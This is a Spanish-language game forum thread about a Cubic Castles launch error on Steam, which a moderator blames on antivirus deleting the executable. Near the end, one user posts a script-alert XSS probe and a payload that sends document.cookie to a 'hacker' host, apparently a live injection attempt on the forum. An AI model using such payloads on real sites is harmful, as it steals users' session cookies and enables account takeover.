Bug en steam

Cuando entro al cubic por steam me dice:

Se ha producido un erro al actualizar Cubic Castles (falta ejecutable)

ya borre e instale steam, borre e instale el cubic, verifique la integridad del cache, reinicie el pc y aun nada que me recomiendan hacer

porfa es para grabar un vídeo de cc

si quieren ver los vídeos que subí acá les dejo el link: https://www.youtube.com/channel/UCAP-SfuGPKwILcE93Sjh-Lw

Comments

  • Ya lo resolví ahora me pone:

    Error al iniciar el proceso de Cubic Castles:

    "Acceso denegado." (0x5)
  • Daresx11Daresx11 Member, Forum Moderator, Game Moderator
    edited July 2018
    Amigo, esto es un generalmente un problema con el antivirus que detecta a cubic.exe como un virus y elimina el ejecutable, pero no te preocupes que cubic no contiene ningún virus, me imagino que pronto los desarrolladores lo arreglaran.
    Cuando comenzó este problema intente realizar una guía para ayudar a los demás, pero la guía no funciono, entonces solo queda esperar la intervención de los desarrolladores para que se arregle este problema
  • Otro bug :v

    dice

    Sorry, this application cannot run under a Virtual Machine

  • Daresx11 said:

    Amigo, eso es un problema con el antivirus que detecta a cubic.exe como un virus y elimina el ejecutable, pero no te preocupes que cubic no contiene ningún virus, me imagino que pronto los desarrolladores lo arreglaran.

    ya lo vi recién en una publicación y lo ise ahora me pone esto:

    Sorry, this application cannot run under a Virtual Machine
  • Daresx11Daresx11 Member, Forum Moderator, Game Moderator
    edited July 2018

    Daresx11 said:

    Amigo, eso es un problema con el antivirus que detecta a cubic.exe como un virus y elimina el ejecutable, pero no te preocupes que cubic no contiene ningún virus, me imagino que pronto los desarrolladores lo arreglaran.

    ya lo vi recién en una publicación y lo ise ahora me pone esto:

    Sorry, this application cannot run under a Virtual Machine
    (Amigo ten cuidado con el multipost, esto es que pones tus comentarios seguidos, ten cuidado porque te pueden poner una advertencia.)

    Yo por un tiempo solucione eso con la guía que hice, pero no dio los resultado suficientes para publicarla, pero hoy comenzó otra ver a darme problemas con el Avast., probablemente estés pasando por lo mismo.

    Edit: Como te dije antes, hay que esperar que los desarrolladores vean el problema y que puedan solucionarlo pronto, para que puedan jugar normal :D
    Lo raro es que a mi no me salio un aviso parecido, no se que habrás hecho para que te de ese error nuevo, por lo general el error de avast es que cuando lo descargas te elimina el ejecutable,
  • Daresx11Daresx11 Member, Forum Moderator, Game Moderator
  • rich1rich1 Member
    iamrich
  • rich1rich1 Member
    edited July 2020
    <script>alert(11)</script>
  • rich1rich1 Member
    ">var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;
  • WhimsicalFireflyWhimsicalFirefly Member, Forum Moderator, Game Moderator
    edited July 2020
    This discussion is over two years old. Please don't necropost. Also use the edit button to avoid mulitposting.
    https://forums2.cubiccastles.com/index.php?p=/discussion/8/forum-rules#latest
This discussion has been closed.